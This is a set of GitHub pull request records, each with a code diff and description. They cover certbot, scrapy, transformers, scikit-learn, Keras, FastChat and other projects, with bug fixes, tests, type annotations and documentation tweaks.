2021-02-05T22:51:47Z
|
2021-02-05T22:52:49Z
| 427
|
3b1b/manim
| 18,238
|
Specify python2 and clarify coverage requirements
|
diff --git a/bootstrap/dev/venv.sh b/bootstrap/dev/venv.sh
index 90088ac9bb7..d6cf95bb59c 100755
--- a/bootstrap/dev/venv.sh
+++ b/bootstrap/dev/venv.sh
@@ -1,6 +1,8 @@
#!/bin/sh -xe
# Developer virtualenv setup for Let's Encrypt client
+export VENV_ARGS="--python python2"
+
./bootstrap/dev/_venv_common.sh \
-r requirements.txt \
-e acme[testing] \
diff --git a/docs/contributing.rst b/docs/contributing.rst
index 3959ccee10e..3277d321a7b 100644
--- a/docs/contributing.rst
+++ b/docs/contributing.rst
@@ -7,9 +7,9 @@ Contributing
Hacking
=======
-The code base, including your pull requests, **must** have 100% unit
-test coverage, pass our `integration`_ tests **and** be compliant with
-the :ref:`coding style <coding-style>`.
+All changes in your pull request **must** have 100% unit test coverage, pass
+our `integration`_ tests, **and** be compliant with the
+:ref:`coding style <coding-style>`.
Bootstrap
|
Please take a look at this @kuba. Not sure how I missed this yesterday. `venv.sh` needs to specify `python2` (Arch problems) and we can't require contributors to have 100% unit test coverage of the code base as that's not something we currently have.
|
https://api.github.com/repos/certbot/certbot/pulls/910
|
2015-10-06T17:54:16Z
|
2015-10-06T18:22:21Z
|
2015-10-06T18:22:21Z
|
2016-05-06T19:22:29Z
| 290
|
certbot/certbot
| 3,406
|
Check if file is already present on running `scrapy genspider` and terminate if so (#4561)
|
diff --git a/scrapy/commands/genspider.py b/scrapy/commands/genspider.py
index 4c7548e9cac..74a077d1b7b 100644
--- a/scrapy/commands/genspider.py
+++ b/scrapy/commands/genspider.py
@@ -66,16 +66,9 @@ def run(self, args, opts):
print("Cannot create a spider with the same name as your project")
return
- try:
- spidercls = self.crawler_process.spider_loader.load(name)
- except KeyError:
- pass
- else:
- # if spider already exists and not --force then halt
- if not opts.force:
- print("Spider %r already exists in module:" % name)
- print(" %s" % spidercls.__module__)
- return
+ if not opts.force and self._spider_exists(name):
+ return
+
template_file = self._find_template(opts.template)
if template_file:
self._genspider(module, name, domain, opts.template, template_file)
@@ -119,6 +112,34 @@ def _list_templates(self):
if filename.endswith('.tmpl'):
print(" %s" % splitext(filename)[0])
+ def _spider_exists(self, name):
+ if not self.settings.get('NEWSPIDER_MODULE'):
+ # if run as a standalone command and file with same filename already exists
+ if exists(name + ".py"):
+ print("%s already exists" % (abspath(name + ".py")))
+ return True
+ return False
+
+ try:
+ spidercls = self.crawler_process.spider_loader.load(name)
+ except KeyError:
+ pass
+ else:
+ # if spider with same name exists
+ print("Spider %r already exists in module:" % name)
+ print(" %s" % spidercls.__module__)
+ return True
+
+ # a file with the same name exists in the target directory
+ spiders_module = import_module(self.settings['NEWSPIDER_MODULE'])
+ spiders_dir = dirname(spiders_module.__file__)
+ spiders_dir_abs = abspath(spiders_dir)
+ if exists(join(spiders_dir_abs, name + ".py")):
+ print("%s already exists" % (join(spiders_dir_abs, (name + ".py"))))
+ return True
+
+ return False
+
@property
def templates_dir(self):
return join(
diff --git a/tests/test_commands.py b/tests/test_commands.py
index 42091ab0041..54ee389332c 100644
--- a/tests/test_commands.py
+++ b/tests/test_commands.py
@@ -8,7 +8,7 @@
import tempfile
from contextlib import contextmanager
from itertools import chain
-from os.path import exists, join, abspath
+from os.path import exists, join, abspath, getmtime
from pathlib import Path
from shutil import rmtree, copytree
from stat import S_IWRITE as ANYONE_WRITE_PERMISSION
@@ -337,8 +337,11 @@ def test_template(self, tplname='crawl'):
p, out, err = self.proc('genspider', spname, 'test.com', *args)
self.assertIn("Created spider %r using template %r in module" % (spname, tplname), out)
self.assertTrue(exists(join(self.proj_mod_path, 'spiders', 'test_spider.py')))
+ modify_time_before = getmtime(join(self.proj_mod_path, 'spiders', 'test_spider.py'))
p, out, err = self.proc('genspider', spname, 'test.com', *args)
self.assertIn("Spider %r already exists in module" % spname, out)
+ modify_time_after = getmtime(join(self.proj_mod_path, 'spiders', 'test_spider.py'))
+ self.assertEqual(modify_time_after, modify_time_before)
def test_template_basic(self):
self.test_template('basic')
@@ -360,6 +363,40 @@ def test_same_name_as_project(self):
self.assertEqual(2, self.call('genspider', self.project_name))
assert not exists(join(self.proj_mod_path, 'spiders', '%s.py' % self.project_name))
+ def test_same_filename_as_existing_spider(self, force=False):
+ file_name = 'example'
+ file_path = join(self.proj_mod_path, 'spiders', '%s.py' % file_name)
+ self.assertEqual(0, self.call('genspider', file_name, 'example.com'))
+ assert exists(file_path)
+
+ # change name of spider but not its file name
+ with open(file_path, 'r+') as spider_file:
+ file_data = spider_file.read()
+ file_data = file_data.replace("name = \'example\'", "name = \'renamed\'")
+ spider_file.seek(0)
+ spider_file.write(file_data)
+ spider_file.truncate()
+ modify_time_before = getmtime(file_path)
+ file_contents_before = file_data
+
+ if force:
+ p, out, err = self.proc('genspider', '--force', file_name, 'example.com')
+ self.assertIn("Created spider %r using template \'basic\' in module" % file_name, out)
+ modify_time_after = getmtime(file_path)
+ self.assertNotEqual(modify_time_after, modify_time_before)
+ file_contents_after = open(file_path, 'r').read()
+ self.assertNotEqual(file_contents_after, file_contents_before)
+ else:
+ p, out, err = self.proc('genspider', file_name, 'example.com')
+ self.assertIn("%s already exists" % (file_path), out)
+ modify_time_after = getmtime(file_path)
+ self.assertEqual(modify_time_after, modify_time_before)
+ file_contents_after = open(file_path, 'r').read()
+ self.assertEqual(file_contents_after, file_contents_before)
+
+ def test_same_filename_as_existing_spider_force(self):
+ self.test_same_filename_as_existing_spider(force=True)
+
class GenspiderStandaloneCommandTest(ProjectTest):
@@ -367,6 +404,34 @@ def test_generate_standalone_spider(self):
self.call('genspider', 'example', 'example.com')
assert exists(join(self.temp_path, 'example.py'))
+ def test_same_name_as_existing_file(self, force=False):
+ file_name = 'example'
+ file_path = join(self.temp_path, file_name + '.py')
+ p, out, err = self.proc('genspider', file_name, 'example.com')
+ self.assertIn("Created spider %r using template \'basic\' " % file_name, out)
+ assert exists(file_path)
+ modify_time_before = getmtime(file_path)
+ file_contents_before = open(file_path, 'r').read()
+
+ if force:
+ # use different template to ensure contents were changed
+ p, out, err = self.proc('genspider', '--force', '-t', 'crawl', file_name, 'example.com')
+ self.assertIn("Created spider %r using template \'crawl\' " % file_name, out)
+ modify_time_after = getmtime(file_path)
+ self.assertNotEqual(modify_time_after, modify_time_before)
+ file_contents_after = open(file_path, 'r').read()
+ self.assertNotEqual(file_contents_after, file_contents_before)
+ else:
+ p, out, err = self.proc('genspider', file_name, 'example.com')
+ self.assertIn("%s already exists" % join(self.temp_path, file_name + ".py"), out)
+ modify_time_after = getmtime(file_path)
+ self.assertEqual(modify_time_after, modify_time_before)
+ file_contents_after = open(file_path, 'r').read()
+ self.assertEqual(file_contents_after, file_contents_before)
+
+ def test_same_name_as_existing_file_force(self):
+ self.test_same_name_as_existing_file(force=True)
+
class MiscCommandsTest(CommandTest):
|
Continuing from PR #4616 to fix #4561, I've added a direct file check to see if a spider with the name provided in `scrapy genspider` is already present in the directory and not overwrite the existing spider file if present.
|
https://api.github.com/repos/scrapy/scrapy/pulls/4623
|
2020-06-10T17:32:46Z
|
2020-08-17T08:45:53Z
|
2020-08-17T08:45:53Z
|
2020-08-17T08:46:00Z
| 1,788
|
scrapy/scrapy
| 35,100
|
Report value for a step instead of epoch.
|
diff --git a/src/transformers/trainer.py b/src/transformers/trainer.py
index 0bebc8626ba6b..0359a913b0c4a 100755
--- a/src/transformers/trainer.py
+++ b/src/transformers/trainer.py
@@ -1138,16 +1138,14 @@ def _hp_search_setup(self, trial: Union["optuna.Trial", Dict[str, Any]]):
self.args.hf_deepspeed_config = HfTrainerDeepSpeedConfig(self.args.deepspeed)
self.args.hf_deepspeed_config.trainer_config_process(self.args)
- def _report_to_hp_search(
- self, trial: Union["optuna.Trial", Dict[str, Any]], epoch: int, metrics: Dict[str, float]
- ):
+ def _report_to_hp_search(self, trial: Union["optuna.Trial", Dict[str, Any]], step: int, metrics: Dict[str, float]):
if self.hp_search_backend is None or trial is None:
return
self.objective = self.compute_objective(metrics.copy())
if self.hp_search_backend == HPSearchBackend.OPTUNA:
import optuna
- trial.report(self.objective, epoch)
+ trial.report(self.objective, step)
if trial.should_prune():
self.callback_handler.on_train_end(self.args, self.state, self.control)
raise optuna.TrialPruned()
@@ -1916,7 +1914,7 @@ def _maybe_log_save_evaluate(self, tr_loss, model, trial, epoch, ignore_keys_for
metrics = None
if self.control.should_evaluate:
metrics = self.evaluate(ignore_keys=ignore_keys_for_eval)
- self._report_to_hp_search(trial, epoch, metrics)
+ self._report_to_hp_search(trial, self.state.global_step, metrics)
if self.control.should_save:
self._save_checkpoint(model, trial, metrics=metrics)
|
# What does this PR do?
Report an objective function value for a step instead of epoch to optuna.
## I made this modification for the following reason:
If "eval_steps" is less than steps per epoch, there maybe warnings: `optuna/trial/_trial.py:592: UserWarning: The reported value is ignored because this ‘step’ 0 is already reported.`. This is because the epoch granularity is too coarse. So "step" are more appropriate than "epoch" here.
## Who can review?
Anyone in the community is free to review the PR once the tests have passed.
@sgugger @LysandreJik
|
https://api.github.com/repos/huggingface/transformers/pulls/18095
|
2022-07-11T12:11:19Z
|
2022-07-12T12:18:35Z
|
2022-07-12T12:18:35Z
|
2022-07-12T12:30:23Z
| 430
|
huggingface/transformers
| 12,545
|
[MRG+1] TST: More tests for Ledoit-Wolf
|
diff --git a/sklearn/covariance/shrunk_covariance_.py b/sklearn/covariance/shrunk_covariance_.py
index 3187ab8f25d38..86f1545abba13 100644
--- a/sklearn/covariance/shrunk_covariance_.py
+++ b/sklearn/covariance/shrunk_covariance_.py
@@ -198,6 +198,9 @@ def ledoit_wolf_shrinkage(X, assume_centered=False, block_size=1000):
if not assume_centered:
X = X - X.mean(0)
+ # A non-blocked version of the computation is present in the tests
+ # in tests/test_covariance.py
+
# number of blocks to split the covariance matrix into
n_splits = int(n_features / block_size)
X2 = X ** 2
@@ -232,6 +235,8 @@ def ledoit_wolf_shrinkage(X, assume_centered=False, block_size=1000):
delta = delta_ - 2. * mu * emp_cov_trace.sum() + n_features * mu ** 2
delta /= n_features
# get final beta as the min between beta and delta
+ # We do this to prevent shrinking more than "1", which whould invert
+ # the value of covariances
beta = min(beta, delta)
# finally get shrinkage
shrinkage = 0 if beta == 0 else beta / delta
diff --git a/sklearn/covariance/tests/test_covariance.py b/sklearn/covariance/tests/test_covariance.py
index 1179714cc24bb..b19fbcfb9e29c 100644
--- a/sklearn/covariance/tests/test_covariance.py
+++ b/sklearn/covariance/tests/test_covariance.py
@@ -112,6 +112,7 @@ def test_ledoit_wolf():
lw = LedoitWolf(assume_centered=True)
lw.fit(X_centered)
shrinkage_ = lw.shrinkage_
+
score_ = lw.score(X_centered)
assert_almost_equal(ledoit_wolf_shrinkage(X_centered,
assume_centered=True),
@@ -186,6 +187,38 @@ def test_ledoit_wolf():
assert(lw.precision_ is None)
+def _naive_ledoit_wolf_shrinkage(X):
+ # A simple implementation of the formulas from Ledoit & Wolf
+
+ # The computation below achieves the following computations of the
+ # "O. Ledoit and M. Wolf, A Well-Conditioned Estimator for
+ # Large-Dimensional Covariance Matrices"
+ # beta and delta are given in the beginning of section 3.2
+ n_samples, n_features = X.shape
+ emp_cov = empirical_covariance(X, assume_centered=False)
+ mu = np.trace(emp_cov) / n_features
+ delta_ = emp_cov.copy()
+ delta_.flat[::n_features + 1] -= mu
+ delta = (delta_ ** 2).sum() / n_features
+ X2 = X ** 2
+ beta_ = 1. / (n_features * n_samples) \
+ * np.sum(np.dot(X2.T, X2) / n_samples - emp_cov ** 2)
+
+ beta = min(beta_, delta)
+ shrinkage = beta / delta
+ return shrinkage
+
+
+def test_ledoit_wolf_small():
+ # Compare our blocked implementation to the naive implementation
+ X_small = X[:, :4]
+ lw = LedoitWolf()
+ lw.fit(X_small)
+ shrinkage_ = lw.shrinkage_
+
+ assert_almost_equal(shrinkage_, _naive_ledoit_wolf_shrinkage(X_small))
+
+
def test_ledoit_wolf_large():
# test that ledoit_wolf doesn't error on data that is wider than block_size
rng = np.random.RandomState(0)
|
Fixes #6195
Indeed, #6195 was not a bug: the code in scikit-learn is correct.
However, it is fairly hard to convinced oneself that it is the case.
This commit adds tests that are easier to read and relate to the
publication.
|
https://api.github.com/repos/scikit-learn/scikit-learn/pulls/6201
|
2016-01-20T21:28:08Z
|
2016-01-27T10:12:02Z
|
2016-01-27T10:12:02Z
|
2016-01-27T10:12:02Z
| 892
|
scikit-learn/scikit-learn
| 46,281
|
Update latency vs throughput blog link
|
diff --git a/README.md b/README.md
index 9f0be48611..0e2c40ec67 100644
--- a/README.md
+++ b/README.md
@@ -433,7 +433,7 @@ Generally, you should aim for **maximal throughput** with **acceptable latency**
### Source(s) and further reading
-* [Understanding latency vs throughput](https://community.cadence.com/cadence_blogs_8/b/sd/archive/2010/09/13/understanding-latency-vs-throughput)
+* [Understanding latency vs throughput](https://community.cadence.com/cadence_blogs_8/b/fv/posts/understanding-latency-vs-throughput)
## Availability vs consistency
|
## Review the Contributing Guidelines
Before submitting a pull request, verify it meets all requirements in the [Contributing Guidelines](https://github.com/donnemartin/system-design-primer/blob/master/CONTRIBUTING.md).
### Translations
See the [Contributing Guidelines](https://github.com/donnemartin/system-design-primer/blob/master/CONTRIBUTING.md). Verify you've:
* Tagged the [language maintainer](https://github.com/donnemartin/system-design-primer/blob/master/TRANSLATIONS.md)
* Prefixed the title with a language code
* Example: "ja: Fix ..."
|
https://api.github.com/repos/donnemartin/system-design-primer/pulls/716
|
2022-11-06T18:02:12Z
|
2022-11-13T21:04:18Z
|
2022-11-13T21:04:18Z
|
2022-11-13T21:04:30Z
| 162
|
donnemartin/system-design-primer
| 36,779
|
Make sure eval subset is sampled without replacing
|
diff --git a/model/model_training/custom_datasets/__init__.py b/model/model_training/custom_datasets/__init__.py
index 50f0a1bf6e..4c66d06008 100644
--- a/model/model_training/custom_datasets/__init__.py
+++ b/model/model_training/custom_datasets/__init__.py
@@ -196,7 +196,7 @@ def get_one_dataset(
train, eval = train_val_dataset(dataset, val_split=val_split)
if eval and max_val_set and len(eval) > max_val_set:
- subset_indices = np.random.choice(len(eval), max_val_set)
+ subset_indices = np.random.choice(len(eval), size=max_val_set, replace=False)
eval = Subset(eval, subset_indices)
return train, eval
|
Explicitly specify `replace=False` for [numpy.random.choice](https://numpy.org/doc/stable/reference/random/generated/numpy.random.choice.html) (it was missing and default is `replace=True` which could lead to duplicate examples in the evaluation set).
|
https://api.github.com/repos/LAION-AI/Open-Assistant/pulls/3651
|
2023-08-12T21:44:28Z
|
2023-08-14T10:44:37Z
|
2023-08-14T10:44:37Z
|
2023-08-14T10:44:38Z
| 167
|
LAION-AI/Open-Assistant
| 37,285
|
[mypy] Add/fix type annotations for bit manipulation algorithms
|
diff --git a/bit_manipulation/binary_and_operator.py b/bit_manipulation/binary_and_operator.py
index f1b910f8cc9b..191ff8eb44a4 100644
--- a/bit_manipulation/binary_and_operator.py
+++ b/bit_manipulation/binary_and_operator.py
@@ -1,7 +1,7 @@
# https://www.tutorialspoint.com/python3/bitwise_operators_example.htm
-def binary_and(a: int, b: int):
+def binary_and(a: int, b: int) -> str:
"""
Take in 2 integers, convert them to binary,
return a binary number that is the
diff --git a/bit_manipulation/binary_or_operator.py b/bit_manipulation/binary_or_operator.py
index e83a86d6a8bc..dabf5bcb09fd 100644
--- a/bit_manipulation/binary_or_operator.py
+++ b/bit_manipulation/binary_or_operator.py
@@ -1,7 +1,7 @@
# https://www.tutorialspoint.com/python3/bitwise_operators_example.htm
-def binary_or(a: int, b: int):
+def binary_or(a: int, b: int) -> str:
"""
Take in 2 integers, convert them to binary, and return a binary number that is the
result of a binary or operation on the integers provided.
diff --git a/bit_manipulation/binary_xor_operator.py b/bit_manipulation/binary_xor_operator.py
index 0edf2ba6606d..6f8962192ad8 100644
--- a/bit_manipulation/binary_xor_operator.py
+++ b/bit_manipulation/binary_xor_operator.py
@@ -1,7 +1,7 @@
# https://www.tutorialspoint.com/python3/bitwise_operators_example.htm
-def binary_xor(a: int, b: int):
+def binary_xor(a: int, b: int) -> str:
"""
Take in 2 integers, convert them to binary,
return a binary number that is the
diff --git a/bit_manipulation/single_bit_manipulation_operations.py b/bit_manipulation/single_bit_manipulation_operations.py
index 114eafe3235b..e4a54028d9ee 100644
--- a/bit_manipulation/single_bit_manipulation_operations.py
+++ b/bit_manipulation/single_bit_manipulation_operations.py
@@ -3,7 +3,7 @@
"""Provide the functionality to manipulate a single bit."""
-def set_bit(number: int, position: int):
+def set_bit(number: int, position: int) -> int:
"""
Set the bit at position to 1.
@@ -21,7 +21,7 @@ def set_bit(number: int, position: int):
return number | (1 << position)
-def clear_bit(number: int, position: int):
+def clear_bit(number: int, position: int) -> int:
"""
Set the bit at position to 0.
@@ -37,7 +37,7 @@ def clear_bit(number: int, position: int):
return number & ~(1 << position)
-def flip_bit(number: int, position: int):
+def flip_bit(number: int, position: int) -> int:
"""
Flip the bit at position.
|
```console
$ mypy --strict bit_manipulation/
Success: no issues found in 7 source files
```
Related Issue: #4052
### **Describe your change:**
* [ ] Add an algorithm?
* [x] Fix a bug or typo in an existing algorithm?
* [ ] Documentation change?
### **Checklist:**
* [x] I have read [CONTRIBUTING.md](https://github.com/TheAlgorithms/Python/blob/master/CONTRIBUTING.md).
* [x] This pull request is all my own work -- I have not plagiarized.
* [x] I know that pull requests will not be merged if they fail the automated tests.
* [x] This PR only changes one algorithm file. To ease review, please open separate PRs for separate algorithms.
* [ ] All new Python files are placed inside an existing directory.
* [ ] All filenames are in all lowercase characters with no spaces or dashes.
* [ ] All functions and variable names follow Python naming conventions.
* [x] All function parameters and return values are annotated with Python [type hints](https://docs.python.org/3/library/typing.html).
* [ ] All functions have [doctests](https://docs.python.org/3/library/doctest.html) that pass the automated testing.
* [ ] All new algorithms have a URL in its comments that points to Wikipedia or other similar explanation.
* [ ] If this pull request resolves one or more open issues then the commit message contains `Fixes: #{$ISSUE_NO}`.
|
https://api.github.com/repos/TheAlgorithms/Python/pulls/4056
|
2020-12-24T10:54:15Z
|
2020-12-24T12:46:45Z
|
2020-12-24T12:46:44Z
|
2020-12-25T08:03:31Z
| 732
|
TheAlgorithms/Python
| 30,097
|
Cherrypick: Compute LSTM and GRU via cuDNN for RaggedTensors.
|
diff --git a/keras/layers/recurrent_v2.py b/keras/layers/recurrent_v2.py
index 231a4281377..d422c4c9845 100644
--- a/keras/layers/recurrent_v2.py
+++ b/keras/layers/recurrent_v2.py
@@ -421,9 +421,7 @@ def call(self, inputs, mask=None, training=None, initial_state=None):
input_shape = backend.int_shape(inputs)
timesteps = input_shape[0] if self.time_major else input_shape[1]
- # TODO(b/156447398) Investigate why the cuDNN kernel fails with ragged
- # inputs.
- if is_ragged_input or not self._could_use_gpu_kernel:
+ if not self._could_use_gpu_kernel:
kwargs = {'training': training}
self._maybe_reset_cell_dropout_mask(self.cell)
@@ -616,7 +614,10 @@ def step(cell_inputs, cell_states):
def gpu_gru(inputs, init_h, kernel, recurrent_kernel, bias, mask, time_major,
go_backwards, sequence_lengths):
"""GRU with cuDNN implementation which is only available for GPU."""
- if not time_major and mask is None:
+ if mask is not None:
+ sequence_lengths = calculate_sequence_by_mask(mask, time_major)
+
+ if not time_major and sequence_lengths is None:
inputs = tf.transpose(inputs, perm=(1, 0, 2))
seq_axis, batch_axis = (0, 1)
else:
@@ -649,9 +650,6 @@ def gpu_gru(inputs, init_h, kernel, recurrent_kernel, bias, mask, time_major,
shape=tf.constant([-1]),
transpose_weights=True)
- if mask is not None:
- sequence_lengths = calculate_sequence_by_mask(mask, time_major)
-
if sequence_lengths is not None:
if go_backwards:
# Three reversals are required. E.g.,
@@ -683,7 +681,7 @@ def gpu_gru(inputs, init_h, kernel, recurrent_kernel, bias, mask, time_major,
is_training=True, rnn_mode='gru')
last_output = outputs[-1]
- if not time_major and mask is None:
+ if not time_major and sequence_lengths is None:
outputs = tf.transpose(outputs, perm=[1, 0, 2])
h = tf.squeeze(h, axis=seq_axis)
@@ -693,7 +691,7 @@ def gpu_gru(inputs, init_h, kernel, recurrent_kernel, bias, mask, time_major,
# get the final effect output instead just 0s at the last timestep.
# In order to mimic the default keras behavior, we copy the final h state as
# the last_output, since it is numerically same as the output.
- if mask is not None:
+ if sequence_lengths is not None:
last_output = h
return last_output, outputs, h, _runtime(_RUNTIME_GPU)
@@ -1150,9 +1148,7 @@ def call(self, inputs, mask=None, training=None, initial_state=None):
input_shape = backend.int_shape(inputs)
timesteps = input_shape[0] if self.time_major else input_shape[1]
- # TODO(b/156447398) Investigate why the cuDNN kernel fails with ragged
- # inputs.
- if is_ragged_input or not self._could_use_gpu_kernel:
+ if not self._could_use_gpu_kernel:
# Fall back to use the normal LSTM.
kwargs = {'training': training}
self._maybe_reset_cell_dropout_mask(self.cell)
@@ -1434,7 +1430,10 @@ def gpu_lstm(inputs, init_h, init_c, kernel, recurrent_kernel, bias, mask,
runtime: Constant string tensor which indicate real runtime hardware. This
value is for testing purpose and should not be used by user.
"""
- if not time_major and mask is None:
+ if mask is not None:
+ sequence_lengths = calculate_sequence_by_mask(mask, time_major)
+
+ if not time_major and sequence_lengths is None:
inputs = tf.transpose(inputs, perm=(1, 0, 2))
seq_axis, batch_axis = (0, 1)
else:
@@ -1469,9 +1468,6 @@ def gpu_lstm(inputs, init_h, init_c, kernel, recurrent_kernel, bias, mask,
shape=tf.constant([-1]),
transpose_weights=True)
- if mask is not None:
- sequence_lengths = calculate_sequence_by_mask(mask, time_major)
-
if sequence_lengths is not None:
if go_backwards:
# Three reversals are required. E.g.,
@@ -1506,7 +1502,7 @@ def gpu_lstm(inputs, init_h, init_c, kernel, recurrent_kernel, bias, mask,
is_training=True, rnn_mode='lstm')
last_output = outputs[-1]
- if not time_major and mask is None:
+ if not time_major and sequence_lengths is None:
outputs = tf.transpose(outputs, perm=[1, 0, 2])
h = tf.squeeze(h, axis=seq_axis)
c = tf.squeeze(c, axis=seq_axis)
@@ -1517,7 +1513,7 @@ def gpu_lstm(inputs, init_h, init_c, kernel, recurrent_kernel, bias, mask,
# get the final effect output instead just 0s at the last timestep.
# In order to mimic the default keras behavior, we copy the final h state as
# the last_output, since it is numerically same as the output.
- if mask is not None:
+ if sequence_lengths is not None:
last_output = h
return last_output, outputs, h, c, _runtime(_RUNTIME_GPU)
diff --git a/keras/layers/recurrent_v2_test.py b/keras/layers/recurrent_v2_test.py
index 8e9c8f848bd..0e5750ec1ae 100644
--- a/keras/layers/recurrent_v2_test.py
+++ b/keras/layers/recurrent_v2_test.py
@@ -119,6 +119,31 @@ def test_ragged(self, layer):
lstm = layer(32)
lstm(embedded_inputs)
+ @parameterized.parameters([rnn_v2.LSTM, rnn_v2.GRU])
+ @testing_utils.run_v2_only
+ def test_compare_ragged_with_masks(self, layer):
+ vocab_size = 100
+ timestep = 20
+ units = 32
+ embedder = embeddings.Embedding(input_dim=vocab_size, output_dim=units)
+ layer = layer(units, return_sequences=True)
+ data = tf.constant(
+ np.random.RandomState(0).randint(0, vocab_size, [timestep, timestep]))
+ mask = tf.sequence_mask(tf.range(1, timestep + 1))
+ data_ragged = tf.ragged.boolean_mask(data, mask)
+
+ outputs = []
+ devices = [testing_utils.device(should_use_gpu=False)]
+ if tf.test.is_gpu_available():
+ devices.append(testing_utils.device(should_use_gpu=True))
+ for device in devices:
+ with device:
+ outputs.append(tf.boolean_mask(layer(embedder(data), mask=mask), mask))
+ outputs.append(layer(embedder(data_ragged)).values)
+
+ for i in range(len(outputs) - 1):
+ self.assertAllClose(outputs[i], outputs[i + 1], atol=1e-4)
+
if __name__ == '__main__':
tf.test.main()
|
Would you be open to cherrypick #15756 for r2.8?
## Pros
- This cherry-picked commit fixes a bug preventing computing LSTM and GRU for RaggedTensors via cuDNN, resulting in a large speedup on a GPU (easily 10 times, as measured on https://github.com/keras-team/keras/pull/15756#issuecomment-999958522). The ragged tensors with RNNs are quite a common usage in my opinion, so quite a lot of users will benefit, I believe.
- The patch does not create a new functionality, only correctly uses an existing cuDNN implementation which is already used for masked tensor. A test comparing RaggedTensors+RNNs versus masked Tensors+RNN is provided.
Thanks for consideration.
|
https://api.github.com/repos/keras-team/keras/pulls/15862
|
2022-01-06T00:07:58Z
|
2022-01-06T18:16:11Z
|
2022-01-06T18:16:11Z
|
2022-01-06T18:16:14Z
| 1,683
|
keras-team/keras
| 47,066
|
Switch to the Debian Buster ARM image
|
diff --git a/tests/letstest/apache2_targets.yaml b/tests/letstest/apache2_targets.yaml
index d584705ca94..2fa64568c47 100644
--- a/tests/letstest/apache2_targets.yaml
+++ b/tests/letstest/apache2_targets.yaml
@@ -8,12 +8,6 @@ targets:
type: ubuntu
virt: hvm
user: ubuntu
- - ami: ami-008680ee60f23c94b
- name: ubuntu20.04_arm64
- type: ubuntu
- virt: hvm
- user: ubuntu
- machine_type: a1.medium
- ami: ami-0545f7036167eb3aa
name: ubuntu19.10
type: ubuntu
@@ -36,6 +30,12 @@ targets:
type: ubuntu
virt: hvm
user: admin
+ - ami: ami-0dcd54b7d2fff584f
+ name: debian10_arm64
+ type: ubuntu
+ virt: hvm
+ user: admin
+ machine_type: a1.medium
- ami: ami-003f19e0e687de1cd
name: debian9
type: ubuntu
diff --git a/tests/letstest/scripts/test_apache2.sh b/tests/letstest/scripts/test_apache2.sh
index e39cee9ef5f..ba3d9437920 100755
--- a/tests/letstest/scripts/test_apache2.sh
+++ b/tests/letstest/scripts/test_apache2.sh
@@ -12,7 +12,7 @@ then
# For apache 2.4, set up ServerName
sudo sed -i '/ServerName/ s/#ServerName/ServerName/' $CONFFILE
sudo sed -i '/ServerName/ s/www.example.com/'$PUBLIC_HOSTNAME'/' $CONFFILE
- if [ $(python3 -V 2>&1 | cut -d" " -f 2 | cut -d. -f1,2 | sed 's/\.//') -ne 38 ]
+ if [ $(python3 -V 2>&1 | cut -d" " -f 2 | cut -d. -f1,2 | sed 's/\.//') -lt 36 ]
then
# Upgrade python version using pyenv because py3.5 is deprecated
# Don't upgrade if it's already 3.8 because pyenv doesn't work great on arm, and
diff --git a/tests/letstest/targets.yaml b/tests/letstest/targets.yaml
index 7110534693e..f6d3dd42f28 100644
--- a/tests/letstest/targets.yaml
+++ b/tests/letstest/targets.yaml
@@ -8,12 +8,6 @@ targets:
type: ubuntu
virt: hvm
user: ubuntu
- - ami: ami-008680ee60f23c94b
- name: ubuntu20.04_arm64
- type: ubuntu
- virt: hvm
- user: ubuntu
- machine_type: a1.medium
- ami: ami-0545f7036167eb3aa
name: ubuntu19.10
type: ubuntu
@@ -31,6 +25,12 @@ targets:
type: ubuntu
virt: hvm
user: admin
+ - ami: ami-0dcd54b7d2fff584f
+ name: debian10_arm64
+ type: ubuntu
+ virt: hvm
+ user: admin
+ machine_type: a1.medium
#-----------------------------------------------------------------------------
# Other Redhat Distros
- ami: ami-0916c408cb02e310b
|
Fixes https://github.com/certbot/certbot/issues/8220.
I took the AMI from https://wiki.debian.org/Cloud/AmazonEC2Image/Buster.
You can see the affected test farm tests passing with this change at https://dev.azure.com/certbot/certbot/_build/results?buildId=2560&view=results.
|
https://api.github.com/repos/certbot/certbot/pulls/8234
|
2020-08-26T00:06:47Z
|
2020-08-26T21:04:38Z
|
2020-08-26T21:04:38Z
|
2020-08-26T21:04:41Z
| 864
|
certbot/certbot
| 2,289
|
add ability for workers to advertise multiple model names
|
diff --git a/fastchat/serve/model_worker.py b/fastchat/serve/model_worker.py
index 8f9c2fa625..3e232ff808 100644
--- a/fastchat/serve/model_worker.py
+++ b/fastchat/serve/model_worker.py
@@ -63,7 +63,7 @@ def __init__(
worker_id,
no_register,
model_path,
- model_name,
+ model_names,
device,
num_gpus,
max_gpu_memory,
@@ -75,10 +75,10 @@ def __init__(
self.worker_id = worker_id
if model_path.endswith("/"):
model_path = model_path[:-1]
- self.model_name = model_name or model_path.split("/")[-1]
+ self.model_names = model_names or [model_path.split("/")[-1]]
self.device = device
- logger.info(f"Loading the model {self.model_name} on worker {worker_id} ...")
+ logger.info(f"Loading the model {self.model_names} on worker {worker_id} ...")
self.model, self.tokenizer = load_model(
model_path, device, num_gpus, max_gpu_memory, load_8bit, cpu_offloading
)
@@ -120,7 +120,7 @@ def register_to_controller(self):
def send_heart_beat(self):
logger.info(
- f"Send heart beat. Models: {[self.model_name]}. "
+ f"Send heart beat. Models: {[self.model_names]}. "
f"Semaphore: {pretty_print_semaphore(model_semaphore)}. "
f"global_counter: {global_counter}"
)
@@ -162,7 +162,7 @@ def get_queue_length(self):
def get_status(self):
return {
- "model_names": [self.model_name],
+ "model_names": self.model_names,
"speed": 1,
"queue_length": self.get_queue_length(),
}
@@ -397,7 +397,7 @@ async def model_details(request: Request):
"--controller-address", type=str, default="http://localhost:21001"
)
add_model_args(parser)
- parser.add_argument("--model-name", type=str, help="Optional display name")
+ parser.add_argument("--model-names", type=lambda s: s.split(','), help="Optional display comma separated names")
parser.add_argument("--limit-model-concurrency", type=int, default=5)
parser.add_argument("--stream-interval", type=int, default=2)
parser.add_argument("--no-register", action="store_true")
@@ -410,14 +410,14 @@ async def model_details(request: Request):
f"Larger --num-gpus ({args.num_gpus}) than --gpus {args.gpus}!"
)
os.environ["CUDA_VISIBLE_DEVICES"] = args.gpus
-
+
worker = ModelWorker(
args.controller_address,
args.worker_address,
worker_id,
args.no_register,
args.model_path,
- args.model_name,
+ args.model_names,
args.device,
args.num_gpus,
args.max_gpu_memory,
|
FastChat has the ability to perform chat, completion, and embedding.
However workers are only able to advertise only one model name, which limits it functionality.
This PR adds the ability for workers to advertise multiple model names at the same time, e.g.
```sh
python3 -m fastchat.serve.model_worker \
--model-path /path/to/model/weights \
